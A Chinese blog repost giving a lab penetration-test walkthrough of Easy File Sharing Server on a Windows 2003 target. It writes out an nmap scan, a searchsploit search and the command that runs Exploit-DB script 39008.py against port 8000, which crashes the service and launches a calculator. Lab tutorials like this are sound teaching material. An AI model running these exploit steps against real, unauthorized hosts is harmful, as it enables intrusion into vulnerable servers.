其他分享
首页 > 其他分享> > 关于easy file sharing server的漏洞渗透测试

关于easy file sharing server的漏洞渗透测试

作者:互联网

1、靶机(这里用的是windows 2003系统)安装easy file sharing server,配置好所给信息。

 URL处(马赛克的地方)填靶机的IP地址,IP地址可以在命令行输入ipconfig/all查看,不过点开这个程序的时候它就自动帮你输入这个IP地址了,所要做的就只是把端口改成8000和在URL后加上:8000

2、在kali里使用nmap扫描主机

nmap -sV -A -o easy-file.txt 192.168.78.133(靶机ip)

可以看到靶机已经开启了easy file sharing服务

3、再输入searchsploit Easy File Sharing Web Server搜索可利用的漏洞脚本

选择有很多,这里随便选一个39008.py脚本。

4、输入python /usr/share/exploitdb/exploits/windows/remote/39008.py 192.168.78.133 8000

这时发现靶机的程序崩溃,并运行了计算机程序

 测试完成

标签:sharing,easy,server,file,IP地址,靶机,8000
来源: https://blog.csdn.net/ZeroVector/article/details/121915885